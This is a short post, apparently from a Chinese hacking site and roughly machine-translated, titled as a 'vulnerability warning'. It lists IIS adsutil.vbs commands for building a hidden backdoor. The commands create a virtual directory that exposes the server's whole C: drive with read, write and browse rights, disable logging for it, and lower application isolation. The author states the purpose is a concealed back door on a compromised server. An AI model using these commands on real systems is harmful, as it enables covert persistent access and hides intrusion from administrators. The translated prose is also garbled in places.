CMD build under virtual directory-vulnerability warning-the black bar safety net

2007-10-17T00:00:00
ID MYHACK58:62200717277
Type myhack58
Reporter 佚名
Modified 2007-10-17T00:00:00

Description

The following is an ugly beggar<web data separation> web and data separated,there was Pcanywhere,the database server has IIS, cscript.exe c:\inetpub\adminscripts\adsutil.vbs get w3svc/1/serverbindings first Web service port cscript.exe c:\inetpub\adminscripts\adsutil.vbs create w3svc/1/root/wodexi/ IisWebVirtualDir create a virtual directory wodexi cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/path: c:\ set path cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/accesswrite 1 set the write permissions cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/accessread 1 set read permissions cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/enabledirbrowsing 1 Column directory permissions cscript.exe c:\inetpub\adminscripts\adsutil.vbs start _ server w3svc/1 Start-1 No. Web Services In IE the URL is written on the http://IP/wodexi/ Oh appear up directories!

I added the following: cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/DontLog 1 does not set the log

Was originally going to write a BAT build 2K under have system permissions to hide the virtual back door,but in the test of the time to find the CMD to establish virtual directory, and Internet Information Services in the establishment of a virtual directory is different,establish a virtual directory can't perform ADMIN commands. Interested friends can test yourself: cscript.exe c:\inetpub\adminscripts\adsutil.vbs set w3svc/1/root/wodexi/AppIsolated 0 modify virtual directory wodexi the application protection to"low" AppIsolated there is another 2 argument 1: The protection of“,” 2: protection to“high”